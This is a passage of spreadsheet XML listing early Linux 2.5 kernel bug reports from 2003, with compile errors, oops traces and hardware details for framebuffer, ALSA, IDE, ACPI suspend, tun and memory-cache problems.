  </si>
  <si>
    <t>Kees</t>
  </si>
  <si>
    <t>2005-08-15 17:34 UTC</t>
  </si>
  <si>
    <t>Antonino Daplas</t>
  </si>
  <si>
    <t>Distribution: Debian sid Hardware Environment: toshiba satellite pro 6100 Software Environment: Problem Description: I'm happily using X at the moment, so it's not a very serious problem. But since i don't like badness on my machine, I just report it ;-) I copied the following bootmessages from the systemlog after starting X (that doesn't use FB). At boot time, my screen looked distorted. I could still read most texts but it's not what it should be. Mar 5 22:00:18 debbie kernel: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A Mar 5 22:00:18 debbie kernel: parport0: PC-style at 0x378 (0x778) [PCSPP,TRISTATE] Mar 5 22:00:18 debbie kernel: parport0: irq 7 detected Mar 5 22:00:18 debbie kernel: rivafb: nVidia device/chipset 10DE0175 Mar 5 22:00:18 debbie kernel: rivafb: On a laptop. Assuming Digital Flat Panel Mar 5 22:00:18 debbie kernel: rivafb: Detected CRTC controller 1 being used Mar 5 22:00:18 debbie kernel: rivafb: RIVA MTRR set to ON Mar 5 22:00:18 debbie kernel: rivafb: PCI nVidia NV20 framebuffer ver 0.9.5b (nVidiaGeForce4-4, 16MB @ 0xEC000000) Mar 5 22:00:18 debbie kernel: Badness in kobject_register at lib/kobject.c:152 Mar 5 22:00:18 debbie kernel: Call Trace: [&lt;c020a05e&gt;] [&lt;c0241a0a&gt;] [&lt;c0241e0d&gt;] [&lt;c017a155&gt;] [&lt;c020eafa&gt;] [&lt;c010506e&gt;] [&lt;c0105031&gt;] [&lt;c010715d&gt;] Mar 5 22:00:18 debbie kernel: Console: switching to colour frame buffer device 80x30 Mar 5 22:00:18 debbie kernel: pty: 256 Unix98 ptys configured Mar 5 22:00:18 debbie kernel: Toshiba System Managment Mode driver v1.11 26/9/2001</t>
  </si>
  <si>
    <t>compile failure in drivers/cpufreq/userspace.c</t>
  </si>
  <si>
    <t>2003-03-05 13:36 UTC</t>
  </si>
  <si>
    <t>2003-03-11 11:33 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo 1.4rc3 Hardware Environment: Abit KG7-RAID, AMD Athlon TBird 1.4, 512MB DDR, Geforce 3 Software Environment: gcc 3.2.2, glibc 2.3.1, ld 2.13.90.0.18 Problem Description: gcc -Wp,-MD,drivers/cpufreq/.userspace.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-prototypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stack-boundary=2 -march=athlon -Iinclude/asm-i386/mach-default -nostdinc -iwithprefix include -DKBUILD_BASENAME=userspace -DKBUILD_MODNAME=userspace -c -o drivers/cpufreq/.tmp_userspace.o drivers/cpufreq/userspace.c drivers/cpufreq/userspace.c: In function `cpufreq_governor_userspace': drivers/cpufreq/userspace.c:514: structure has no member named `intf' drivers/cpufreq/userspace.c:523: structure has no member named `intf' make[2]: *** [drivers/cpufreq/userspace.o] Error 1 make[1]: *** [drivers/cpufreq] Error 2 make: *** [drivers] Error 2 Steps to reproduce: Power management options (ACPI, APM) ---&gt; CPU Frequency scaling ---&gt; &lt;*&gt; 'userspace' governor for userspace frequency scaling CONFIG_CPU_FREQ_GOV_USERSPACE=y</t>
  </si>
  <si>
    <t>warnings from sound/pci/cs46xx/cs46xx_lib.c:</t>
  </si>
  <si>
    <t>2003-03-06 10:16 UTC</t>
  </si>
  <si>
    <t>2003-06-11 10:03 UTC</t>
  </si>
  <si>
    <t>sound/pci/cs46xx/cs46xx_lib.c: In function `snd_cs46xx_playback_hw_params': sound/pci/cs46xx/cs46xx_lib.c:1027: warning: unused variable `period_size' sound/pci/cs46xx/cs46xx_lib.c:1026: warning: unused variable `sample_rate' sound/pci/cs46xx/cs46xx_lib.c:1025: warning: unused variable `chip' sound/pci/cs46xx/cs46xx_lib.c: In function `snd_cs46xx_capture_hw_params': sound/pci/cs46xx/cs46xx_lib.c:1214: warning: unused variable `period_size' sound/pci/cs46xx/cs46xx_lib.c: At top level: sound/pci/cs46xx/cs46xx_lib.c:1406: warning: `hw_constraints_period_sizes' defined but not used</t>
  </si>
  <si>
    <t>bug@snd_ctl_release</t>
  </si>
  <si>
    <t>2003-03-06 11:52 UTC</t>
  </si>
  <si>
    <t>Siim Vahtre</t>
  </si>
  <si>
    <t>2003-05-04 07:10 UTC</t>
  </si>
  <si>
    <t>Hardware Environment: ALSA device list: #0: Intel 82801BA-ICH2 at 0xe800, irq 10 Problem Description: Otherwise everything is wokring perfectly but sometimes a random program that uses /dev/snd/controlC0 will segfault and produce kernel BUG. After that, all programs that try to use sound will hang completely. (kill -9 doesn't help). Here's the bug: Unable to handle kernel paging request at virtual address 000b1150 printing eip: c02a8b47 *pde = 00000000 Oops: 0000 CPU: 0 EIP: 0060:[&lt;c02a8b47&gt;] Not tainted EFLAGS: 00010203 EIP is at snd_ctl_release+0x97/0xf0 eax: 000b1150 ebx: c7df794c ecx: c7df795c edx: 000b1150 esi: c51a8be0 edi: c7df7800 ebp: c5907e60 esp: c60ddf58 ds: 007b es: 007b ss: 0068 Process alsactl (pid: 487, threadinfo=c60dc000 task=c70e6740) Stack: ffffffff c5907e60 00000000 c51a8c00 c5907e60 c7fba520 c4856a30 c4cb18a0 c014dc5b c4856a30 c5907e60 c5907e60 00000000 c71c93c0 c60dc000 c014bf14 c5907e60 c71c93c0 c71c93c0 c5907e60 00000000 c014bfa2 c5907e60 c71c93c0 Call Trace: [&lt;c014dc5b&gt;] __fput+0xdb/0xe0 [&lt;c014bf14&gt;] filp_close+0x74/0xa0 [&lt;c014bfa2&gt;] sys_close+0x62/0xa0 [&lt;c01096ef&gt;] syscall_call+0x7/0xb Code: 8b 00 0f 18 00 39 ca 75 f0 89 d8 ba ff ff 00 00 0f c1 10 0f</t>
  </si>
  <si>
    <t>cat /dev/fb1 -&gt; null pointer @ fb_open</t>
  </si>
  <si>
    <t>2003-03-06 11:59 UTC</t>
  </si>
  <si>
    <t>2003-05-04 07:11 UTC</t>
  </si>
  <si>
    <t>(This bug is tested with 2.5.6[234], with and without latest fbdev patches.) Hardware Environment: rivafb: nVidia device/chipset 10DE0110 rivafb: Detected CRTC controller 0 being used rivafb: RIVA MTRR set to ON rivafb: PCI nVidia NV10 framebuffer ver 0.9.5b (nVidiaGeForce2-M, 64MB @ 0xE8000000) Problem Description: doing simple cat /dev/fb1 will segfault and produce kernel BUG. crw-rw---- 1 root video 29, 0 Mar 14 2002 fb0 crw--w---- 1 root video 29, 32 Mar 14 2002 fb1 (no devfs) Strange is that I only should have fb0 :-) Bug is here: &lt;1&gt;Unable to handle kernel NULL pointer dereference at virtual address 00000191 printing eip: c028f49d *pde = 00000000 Oops: 0000 CPU: 0 EIP: 0060:[&lt;c028f49d&gt;] Not tainted EFLAGS: 00210202 EIP is at fb_open+0x1d/0x50 eax: ffffffed ebx: 00000000 ecx: 00000000 edx: 00000001 esi: c3f926a0 edi: c3932994 ebp: ffffffe9 esp: c3845f30 ds: 007b es: 007b ss: 0068 Process cat (pid: 804, threadinfo=c3844000 task=c49ee100) Stack: 00000000 ffffffed c0155ab6 c3932994 c3f926a0 c3f926a0 c3932994 c7fba560 c014bb9e c3932994 c3f926a0 00008000 00000000 c3526000 c3844000 c014ba28 c3ba0c80 c7fba560 00008000 c3845f80 c3ba0c80 c7fba560 c3526000 c401aebc Call Trace: [&lt;c0155ab6&gt;] chrdev_open+0x66/0x80 [&lt;c014bb9e&gt;] dentry_open+0x16e/0x180 [&lt;c014ba28&gt;] filp_open+0x68/0x70 [&lt;c014be3b&gt;] sys_open+0x5b/0x90 [&lt;c01096ef&gt;] syscall_call+0x7/0xb Code: 8b 82 90 01 00 00 83 78 04 00 75 07 89 c8 83 c4 08 c3 90 c7</t>
  </si>
  <si>
    <t>IDE Changes broke UDMA timings for AMD74xx</t>
  </si>
  <si>
    <t>2003-03-06 18:59 UTC</t>
  </si>
  <si>
    <t>2003-03-31 07:03 UTC</t>
  </si>
  <si>
    <t>Distribution: LFS Some changes in IDE from 2.5.59+ broke UDMA timings for the AMD74xx chipset. niform Multi-Platform E-IDE driver Revision: 7.00alpha2 ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx AMD7441: IDE controller at PCI slot 00:07.1 AMD7441: chipset revision 4 AMD7441: not 100% native mode: will probe irqs later ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx AMD_IDE: Advanced Micro Devic AMD-768 [Opus] IDE (rev 04) UDMA100 controller on pci00: 07.1 ide0: BM-DMA at 0xb800-0xb807, BIOS settings: hda:DMA, hdb:pio ide1: BM-DMA at 0xb808-0xb80f, BIOS settings: hdc:DMA, hdd:DMA hda: MAXTOR 6L060J3, ATA DISK drive hdc: YAMAHA CRW2100E, ATAPI CD/DVD-ROM drive hdd: DVD-ROM DDU1621, ATAPI CD/DVD-ROM drive hda: 117266688 sectors (60041 MB) w/1819KiB Cache, CHS=116336/16/63, UDMA(33) hdc: ATAPI 40X CD-ROM CD-R/RW drive, 8192kB Cache, UDMA(25) hdd: ATAPI 40X DVD-ROM drive, 512kB Cache, UDMA(33) hda should be timed to UDMA100 max chipset speed. (but can go UDMA133 if the chipset on motherboard could support it). When looking at the code differences they were minimal so I couldn't see what broke the timings.</t>
  </si>
  <si>
    <t>Kernel BUG when tun device is closed (oops attached)</t>
  </si>
  <si>
    <t>2003-03-06 20:22 UTC</t>
  </si>
  <si>
    <t>Kevin P. Fleming</t>
  </si>
  <si>
    <t>2003-04-14 12:40 UTC</t>
  </si>
  <si>
    <t>Distribution: heavily modified RedHat 7.3 Hardware Environment: MSI K7T266-Pro2 motherboard, Athlon Thunderbird 1GHz CPU, (2) WD1600JB disks, etc. Software Environment: vtund-2.5 Problem Description: vtund works fine normally (is in client mode on this system). when the server end of the link was shutdown, the client tried to close its open "tun" device. this action caused the oops below. kernel BUG at include/linux/dcache.h:266! invalid operand: 0000 CPU: 0 EIP: 0060:[&lt;c0172a2c&gt;] Not tainted EFLAGS: 00010246 EIP is at sysfs_remove_dir+0x1c/0x13b eax: 00000000 ebx: c434e9a8 ecx: 00000000 edx: 00000000 esi: c7d7f900 edi: cfa50000 ebp: 00000000 esp: cfa51f10 ds: 007b es: 007b ss: 0068 Process vtund (pid: 757, threadinfo=cfa50000 task=cfa913c0) Stack: c03bc980 c434e824 c03bf2d4 c434e9a8 c434e824 cfa50000 00000000 c01fb4b3 c434e9a8 c434e9a8 c01fb4e3 c434e9a8 c434e824 c02f82ed c434e9a8 00000006 c434e824 c434e824 c434e800 c8fc3080 cf8b4500 c0263b2e c434e824 c4e43a40 Call Trace: [&lt;c01fb4b3&gt;] kobject_del+0x13/0x30 [&lt;c01fb4e3&gt;] kobject_unregister+0x13/0x30 [&lt;c02f82ed&gt;] unregister_netdevice+0x1ad/0x290 [&lt;c0263b2e&gt;] tun_chr_close+0x8e/0xa0 [&lt;c0147d39&gt;] __fput+0xa9/0xb0 [&lt;c014627d&gt;] filp_close+0x4d/0x80 [&lt;c0146300&gt;] sys_close+0x50/0x60 [&lt;c010ade3&gt;] syscall_call+0x7/0xb Code: 0f 0b 0a 01 a4 6b 36 c0 ff 06 83 4e 04 08 85 f6 0f 84 01 01</t>
  </si>
  <si>
    <t>2.5.64 Dell Inspiron 5000e heaps of ACPI suspend/resume problems</t>
  </si>
  <si>
    <t>Power-Sleep-Wake</t>
  </si>
  <si>
    <t>2003-03-09 15:10 UTC</t>
  </si>
  <si>
    <t>Andreas Mohr</t>
  </si>
  <si>
    <t>2004-03-03 15:01 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian testing/unstable Hardware Environment: bare-bone I5Ke, with mini-PCI wireless card Software Environment: gcc 3.2.2, libc6 2.3.1, 2.5.64 standard Problem Description: When suspending via echo 1&gt;/proc/acpi/sleep, upon resume I get the following errors frequently: Debug: sleeping function called from illegal context at include/linux/rwsem.h:43 Mar 9 23:43:48 localhost kernel: Call Trace: Mar 9 23:43:48 localhost kernel: [sync_supers+121/240] sync_supers+0x79/0xf0 Mar 9 23:43:48 localhost kernel: [wb_kupdate+96/352] wb_kupdate+0x60/0x160 Mar 9 23:43:48 localhost kernel: [__wake_up_common+58/96] __wake_up_common+0x3a/0x60 Mar 9 23:43:48 localhost kernel: [printk+280/384] printk+0x118/0x180 Mar 9 23:43:48 localhost kernel: [context_switch+124/304] context_switch+0x7c/0x130 Mar 9 23:43:48 localhost kernel: [show_trace+66/144] show_trace+0x42/0x90 Mar 9 23:43:48 localhost kernel: [kernel_thread_helper+5/24] kernel_thread_helper+0x5/0x18 Mar 9 23:43:48 localhost kernel: [schedule+332/560] schedule+0x14c/0x230 Mar 9 23:43:48 localhost kernel: [__pdflush+220/480] __pdflush+0xdc/0x1e0 Mar 9 23:43:48 localhost kernel: [pdflush+0/32] pdflush+0x0/0x20 Mar 9 23:43:48 localhost kernel: [pdflush+17/32] pdflush+0x11/0x20 Mar 9 23:43:48 localhost kernel: [wb_kupdate+0/352] wb_kupdate+0x0/0x160 Mar 9 23:43:48 localhost kernel: [kernel_thread_helper+5/24] kernel_thread_helper+0x5/0x18 bad: scheduling while atomic! Call Trace: [&lt;c011d4c0&gt;] schedule+0x220/0x230 [&lt;c0140608&gt;] __pdflush+0x98/0x1e0 [&lt;c0140750&gt;] pdflush+0x0/0x20 [&lt;c0140761&gt;] pdflush+0x11/0x20 [&lt;c010826d&gt;] kernel_thread_helper+0x5/0x18 The system is still sort-of-usable in console (keeps having errors though), but as soon as I switch back to X11, BOOM, that's it. When trying an echo 3&gt;/proc/acpi/sleep, the notebook doesn't react AT ALL after resume (it does resume, though, but it's dead). Steps to reproduce: This happens both with extensive module/driver/support programs loaded and without ANY modules loaded (just to check whether some driver is guilty of producing this mess). Yeah, I know that Dell produces incredibly crappy BIOS power mgmt code, but it'd be nice to see this running anyway ;-) Any ideas? And what do the various seemingly important error messages below mean? Thanks! Andreas Mohr, Wine developer ACPI boot output: Mar 9 23:45:03 localhost kernel: ACPI: Subsystem revision 20030228 Mar 9 23:45:03 localhost kernel: tbxface-0117 [03] acpi_load_tables : ACP I Tables successfully acquired Mar 9 23:45:03 localhost kernel: Parsing all Control Methods:.................. ................................................................................ ........................................................................... Mar 9 23:45:03 localhost kernel: Table [DSDT] - 602 Objects with 51 Devices 173 Methods 16 Regions Mar 9 23:45:03 localhost kernel: ACPI Namespace successfully loaded at root c03 b2b3c Mar 9 23:45:03 localhost kernel: evxfevnt-0092 [04] acpi_enable : Tra nsition to ACPI mode successful Mar 9 23:45:03 localhost kernel: evgpe-0416 [06] ev_create_gpe_block : GPE Block: 2 registers at 000000000000100C Mar 9 23:45:03 localhost kernel: evgpe-0421 [06] ev_create_gpe_block : GPE Block defined as GPE0 to GPE15 Mar 9 23:45:03 localhost kernel: Executing all Device _STA and_INI methods:.... ...........[ACPI Debug] String: LNKA_STA Mar 9 23:45:03 localhost kernel: [ACPI Debug] Integer: 000000000000000B Mar 9 23:45:03 localhost kernel: ...............[ACPI Debug] String: PCI IDE Pr imary _STA Mar 9 23:45:03 localhost kernel: ......[ACPI Debug] String: USB_STA Mar 9 23:45:03 localhost kernel: ..[ACPI Debug] String: AUD_STA Mar 9 23:45:03 localhost kernel: .[ACPI Debug] String: MDM1_STA Mar 9 23:45:03 localhost kernel: ......[ACPI Debug] String: VGA_STA Mar 9 23:45:03 localhost kernel: ...... Mar 9 23:45:03 localhost kernel: 51 Devices found containing: 51 _STA, 2 _INI m ethods Mar 9 23:45:03 localhost kernel: Completing Region/Field/Buffer/Package initial ization:........................................................................ ....... Mar 9 23:45:03 localhost kernel: Initialized 9/16 Regions 0/0 Fields 25/25 Buff ers 45/46 Packages (602 nodes) Mar 9 23:45:03 localhost kernel: ACPI: Interpreter enabled Mar 9 23:45:03 localhost kernel: ACPI: Using PIC for interrupt routing Mar 9 23:45:03 localhost kernel: ACPI: PCI Root Bridge [PCI0] (00:00) Mar 9 23:45:03 localhost kernel: PCI: Probing PCI hardware (bus 00) &gt;&gt;&gt;&gt;&gt; Mar 9 23:45:03 localhost kernel: acpi_utils-0369 [05] acpi_evaluate_referenc: [ Package] has zero elements (cffee9e0) Mar 9 23:45:03 localhost kernel: acpi_utils-0369 [06] acpi_evaluate_referenc: [ Package] has zero elements (cffee9e0) Mar 9 23:45:03 localhost kernel: acpi_utils-0369 [07] acpi_evaluate_referenc: [ Package] has zero elements (cffee9e0) Mar 9 23:45:03 localhost kernel: acpi_utils-0369 [08] acpi_evaluate_referenc: [ Package] has zero elements (cffee9e0) Mar 9 23:45:03 localhost kernel: acpi_utils-0369 [09] acpi_evaluate_referenc: [ Package] has zero elements (cffee9e0) Mar 9 23:45:03 localhost kernel: acpi_utils-0369 [10] acpi_evaluate_referenc: [ Package] has zero elements (cffee9e0) Mar 9 23:45:03 localhost kernel: [ACPI Debug] String: LNKA_STA Mar 9 23:45:03 localhost kernel: [ACPI Debug] Integer: 000000000000000B Mar 9 23:45:03 localhost kernel: [ACPI Debug] String: LNKA_STA Mar 9 23:45:03 localhost kernel: [ACPI Debug] Integer: 000000000000000B Mar 9 23:45:03 localhost kernel: [ACPI Debug] String: LNKA_STA Mar 9 23:45:03 localhost kernel: [ACPI Debug] Integer: 000000000000000B Mar 9 23:45:03 localhost kernel: [ACPI Debug] String: LNKA_CRS Mar 9 23:45:03 localhost kernel: [ACPI Debug] Buffer: Length 06 Mar 9 23:45:03 localhost kernel: ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 6 7 9 10 *11 14 15) Mar 9 23:45:03 localhost kernel: ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 5 6 7 9 10 11 14 15, disabled) Mar 9 23:45:03 localhost kernel: ACPI: PCI Interrupt Link [LNKC] (IRQs 5 7, dis abled) Mar 9 23:45:03 localhost kernel: ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 *5 6 7 9 10 11 14 15) Mar 9 23:45:03 localhost kernel: ACPI: Embedded Controller [EC0] (gpe 9) Mar 9 23:45:03 localhost kernel: acpi_utils-0369 [17] acpi_evaluate_referenc: [ Package] has zero elements (cffee9e0) Mar 9 23:45:03 localhost kernel: [ACPI Debug] String: PCI IDE Primary _STA Mar 9 23:45:03 localhost kernel: [ACPI Debug] String: PCI IDE Primary _STA Mar 9 23:45:03 localhost kernel: [ACPI Debug] String: USB_STA Mar 9 23:45:03 localhost kernel: [ACPI Debug] String: USB_STA Mar 9 23:45:03 localhost kernel: acpi_utils-0369 [18] acpi_evaluate_referenc: [ Package] has zero elements (cffee9c0) Mar 9 23:45:03 localhost kernel: [ACPI Debug] String: AUD_STA Mar 9 23:45:03 localhost kernel: [ACPI Debug] String: AUD_STA Mar 9 23:45:03 localhost kernel: acpi_utils-0369 [19] acpi_evaluate_referenc: [ Package] has zero elements (cffee980) Mar 9 23:45:03 localhost kernel: [ACPI Debug] String: MDM1_STA Mar 9 23:45:03 localhost kernel: [ACPI Debug] String: MDM1_STA Mar 9 23:45:03 localhost kernel: acpi_utils-0369 [20] acpi_evaluate_referenc: [ Package] has zero elements (cffee960) Mar 9 23:45:03 localhost kernel: acpi_utils-0369 [21] acpi_evaluate_referenc: [ Package] has zero elements (cffe33c0) Mar 9 23:45:03 localhost kernel: acpi_utils-0369 [22] acpi_evaluate_referenc: [ Package] has zero elements (cffe33a0) Mar 9 23:45:03 localhost kernel: acpi_utils-0369 [23] acpi_evaluate_referenc: [ Package] has zero elements (cffe3380) Mar 9 23:45:03 localhost kernel: acpi_utils-0369 [24] acpi_evaluate_referenc: [ Package] has zero elements (cffe3380) Mar 9 23:45:03 localhost kernel: [ACPI Debug] String: VGA_STA Mar 9 23:45:03 localhost kernel: [ACPI Debug] String: VGA_STA Mar 9 23:45:03 localhost kernel: acpi_utils-0369 [25] acpi_evaluate_referenc: [ Package] has zero elements (cffe3340) Mar 9 23:45:03 localhost kernel: ACPI: Power Resource [PFN0] (off) Mar 9 23:45:03 localhost kernel: ACPI: Power Resource [PFN1] (off) Mar 9 23:45:03 localhost kernel: block request queues: Mar 9 23:45:03 localhost kernel: 128 requests per read queue Mar 9 23:45:03 localhost kernel: 128 requests per write queue Mar 9 23:45:03 localhost kernel: 8 requests per batch Mar 9 23:45:03 localhost kernel: enter congestion at 15 Mar 9 23:45:03 localhost kernel: exit congestion at 17 Mar 9 23:45:03 localhost kernel: ACPI: PCI Interrupt Link [LNKB] enabled at IRQ 10 Mar 9 23:45:03 localhost kernel: ACPI: PCI Interrupt Link [LNKC] enabled at IRQ 5 Mar 9 23:45:03 localhost kernel: PCI: Using ACPI for IRQ routing Mar 9 23:45:03 localhost kernel: PCI: if you experience problems, try using opt ion 'pci=noacpi' or even 'acpi=off' &gt;&gt;&gt;&gt;&gt; Mar 9 23:45:03 localhost kernel: PCI: Cannot allocate resource region 4 of devi ce 00:07.1 (00:07.1 is IDE interface, BTW) &gt;&gt;&gt;&gt;&gt; Mar 9 23:45:03 localhost kernel: SBF: ACPI BOOT descriptor is wrong length (39) Mar 9 23:45:03 localhost kernel: SBF: Simple Boot Flag extension found and enab led. Mar 9 23:45:03 localhost kernel: SBF: Setting boot flags 0x1 Mar 9 23:45:03 localhost kernel: cpufreq: Intel(R) SpeedStep(TM) for this chips et not (yet) available. Mar 9 23:45:03 localhost kernel: apm: BIOS version 1.2 Flags 0x03 (Driver versi on 1.16ac) Mar 9 23:45:03 localhost kernel: apm: overridden by ACPI. Mar 9 23:45:03 localhost kernel: Enabling SEP on CPU 0 Mar 9 23:45:03 localhost kernel: aio_setup: sizeof(struct page) = 40 Mar 9 23:45:03 localhost kernel: Journalled Block Device driver loaded Mar 9 23:45:03 localhost kernel: devfs: v1.22 (20021013) Richard Gooch (rgooch@ atnf.csiro.au) Mar 9 23:45:03 localhost kernel: devfs: boot_options: 0x1 Mar 9 23:45:03 localhost kernel: Limiting direct PCI/PCI transfers. Mar 9 23:45:03 localhost kernel: ACPI: AC Adapter [AC] (on-line) Mar 9 23:45:03 localhost kernel: ACPI: Battery Slot [BAT0] (battery present) Mar 9 23:45:03 localhost kernel: ACPI: Battery Slot [BAT1] (battery absent) Mar 9 23:45:03 localhost kernel: ACPI: Lid Switch [LID] Mar 9 23:45:03 localhost kernel: ACPI: Power Button (CM) [PWRB] Mar 9 23:45:03 localhost kernel: ACPI: Sleep Button (CM) [SBTN] Mar 9 23:45:03 localhost kernel: ACPI: Fan [FAN0] (on) Mar 9 23:45:03 localhost kernel: ACPI: Fan [FAN1] (on) Mar 9 23:45:03 localhost kernel: ACPI: Processor [CPU0] (supports C1 C2, 8 thro &gt;&gt;&gt;&gt;&gt;&gt; Mar 9 23:45:03 localhost kernel: acpi_thermal-0373 [34] acpi_thermal_get_trip_: Invalid passive threshold Mar 9 23:45:03 localhost kernel: ACPI: Thermal Zone [THRM] (56 C)</t>
  </si>
  <si>
    <t>Apache test framework causes kernel panic in tcp_v4_get_port</t>
  </si>
  <si>
    <t>2003-03-10 09:25 UTC</t>
  </si>
  <si>
    <t>Thom May</t>
  </si>
  <si>
    <t>2003-11-20 23:22 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Gnu/Linux unstable Hardware Environment: AMD Athlon(tm) XP 1800+; 246Mb RAM, Realtek 8139too Software Environment: 17:11 /usr/src/linux-2.5.64% sh scripts/ver_linux If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux samizdat 2.5.64 #1 Fri Mar 7 17:29:51 GMT 2003 i686 unknown unknown GNU/Linux Gnu C 3.2.3 Gnu make 3.80 util-linux 2.11y mount 2.11y module-init-tools 0.9.10 e2fsprogs 1.32 PPP 2.4.1 Linux C Library 2.3.1 Dynamic linker (ldd) 2.3.1 Procps 3.1.6 Net-tools 1.60 Console-tools 0.2.3 Sh-utils 4.5.8 Modules Loaded Problem Description: When running the httpd test framework for the apache web server, 2.5 series kernels reproducibly kernel panic (tried with 2.5.59, .64-mm1, and vanilla .64) Steps to reproduce: install apache2 or apache including headers and apxs. checkout the perl testing framework. (see http://httpd.apache.org/dev/anoncvs.txt for login details) cvs -d:pserver:anoncvs@cvs.apache.org:/home/cvspublic co httpd-test/perl-framework ensure that you have the required perl modules installed. run the perl framework (I've been running in SMOKE mode) t/SMOKE. After approx 20-25 mins the kernel panics.</t>
  </si>
  <si>
    <t>Using Raid0 and devfs.. I get VFS unable to mount root</t>
  </si>
  <si>
    <t>2003-03-10 09:39 UTC</t>
  </si>
  <si>
    <t>Matt Heler</t>
  </si>
  <si>
    <t>2003-05-27 06:45 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo Hardware Environment: Athlon-XP , two ide drives .. using software raid0 Software Environment: Problem Description: Devfs is set to mount /dev when the system boots, but that function doesnt seem to work with at least a software raid. Steps to reproduce: Use software raid0 , compile in devfs and have it set to mount @ boot. Reboot to new kernel ..</t>
  </si>
  <si>
    <t>error compiling sound/isa/es18xx</t>
  </si>
  <si>
    <t>2.5.64-bk2</t>
  </si>
  <si>
    <t>2003-03-10 19:47 UTC</t>
  </si>
  <si>
    <t>2003-04-15 08:56 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: Compaq Armada 1590DMT Laptop Software Environment: gcc 2.95.4 CONFIG_SOUND=y CONFIG_SND=y CONFIG_SND_ES18XX=y CONFIG_ISA=y CONFIG_PNP=y CONFIG_PNP_NAMES=y CONFIG_PNP_CARD=y CONFIG_ISAPNP=y CONFIG_PNPBIOS=y Problem Description: gcc -Wp,-MD,sound/isa/.es18xx.o.d -D__KERNEL__ -Iinclude -Wall -Wstrict-proto ypes -Wno-trigraphs -O2 -fno-strict-aliasing -fno-common -pipe -mpreferred-stac -boundary=2 -march=i586 -Iinclude/asm-i386/mach-default -fomit-frame-pointer -n stdinc -iwithprefix include -DKBUILD_BASENAME=es18xx -DKBUILD_MODNAME=snd_es 8xx -c -o sound/isa/es18xx.o sound/isa/es18xx.c sound/isa/es18xx.c: In function `snd_audiodrive_isapnp': sound/isa/es18xx.c:1984: warning: implicit declaration of function `isapnp_find dev' sound/isa/es18xx.c:1984: warning: assignment makes pointer from integer without a cast sound/isa/es18xx.c:1985: structure has no member named `active' sound/isa/es18xx.c:1989: warning: assignment makes pointer from integer without a cast sound/isa/es18xx.c:1990: structure has no member named `active' sound/isa/es18xx.c:1995: structure has no member named `prepare' sound/isa/es18xx.c:1997: structure has no member named `activate' sound/isa/es18xx.c:2004: structure has no member named `prepare' sound/isa/es18xx.c:2005: structure has no member named `deactivate' sound/isa/es18xx.c:2009: warning: implicit declaration of function `isapnp_reso rce_change' sound/isa/es18xx.c:2020: structure has no member named `activate' sound/isa/es18xx.c:2022: structure has no member named `deactivate' sound/isa/es18xx.c: In function `snd_audiodrive_deactivate': sound/isa/es18xx.c:2047: structure has no member named `deactivate' sound/isa/es18xx.c:2051: structure has no member named `deactivate' sound/isa/es18xx.c: In function `alsa_card_es18xx_init': sound/isa/es18xx.c:2253: warning: implicit declaration of function `isapnp_prob _cards' make[2]: *** [sound/isa/es18xx.o] Error 1 make[1]: *** [sound/isa] Error 2 make: *** [sound] Error 2 Steps to reproduce:</t>
  </si>
  <si>
    <t>kernel won't release slabcache without prodding</t>
  </si>
  <si>
    <t>2.5.64-bk5</t>
  </si>
  <si>
    <t>2003-03-11 07:33 UTC</t>
  </si>
  <si>
    <t>2003-05-30 07:04 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Testing Hardware Environment: x86, 256MB Ram Software Environment: GCC 2.95.4 Problem Description: Let me preface this with this fact: I am learning C. I could be totally off- base here. Please don't flame me too hard :) My system has 256Megabytes of RAM. I have a program that can malloc up to about 235MB of RAM right after a reboot, and that's fine. However, if I fill up my kernel's cache (using, for example, "ls / -lR"), then my large malloc fails. /proc/slabinfo shows it all in ext3_inode_cache and dentry_cache, which is expected (the kernel should cache info, we don't want the RAM unused). Shouldn't it free some RAM when a program tries to malloc? If I increase the size of the mallocs (50, then 100, then 150, then 200), the kernel will eventually release the memory, and my large malloc will succeed again, but this doesn't seem "right" that I should have to poke and prod it to give me back memory. Steps to reproduce: From a freshly booted kernel, I can malloc up to about 235MB of ram (using a small C program that does: if (argc &gt; 1) megs = atol(argv[1]); size = megs * 1024 * 1024; buf = malloc(size); Then do a "ls / -lR" on a large enough file system. When it is done, most RAM is used on disk cache, and the mallocs will fail. Put slow pressure on the MM system, and it will release it, and then the mallocs succeed. After ls -lR bwindle@razor:~/C$ cat /proc/meminfo MemTotal: 255840 kB MemFree: 18504 kB Buffers: 38712 kB Cached: 10504 kB SwapCached: 0 kB Active: 37444 kB Inactive: 17796 kB HighTotal: 0 kB HighFree: 0 kB LowTotal: 255840 kB LowFree: 18504 kB SwapTotal: 0 kB SwapFree: 0 kB Dirty: 16 kB Writeback: 0 kB Mapped: 10772 kB Slab: 179616 kB Committed_AS: 83980 kB PageTables: 456 kB ReverseMaps: 8616 bwindle@razor:~/C$ free -m total used free shared buffers cached Mem: 249 231 18 0 37 9 -/+ buffers/cache: 183 66 bwindle@razor:~/C$ ./alloc 185 malloc(188743680): Cannot allocate memory</t>
  </si>
  <si>
    <t>oops at kswapd</t>
  </si>
  <si>
    <t>2003-03-11 11:15 UTC</t>
  </si>
  <si>
    <t>2003-04-30 06:18 UTC</t>
  </si>
  <si>
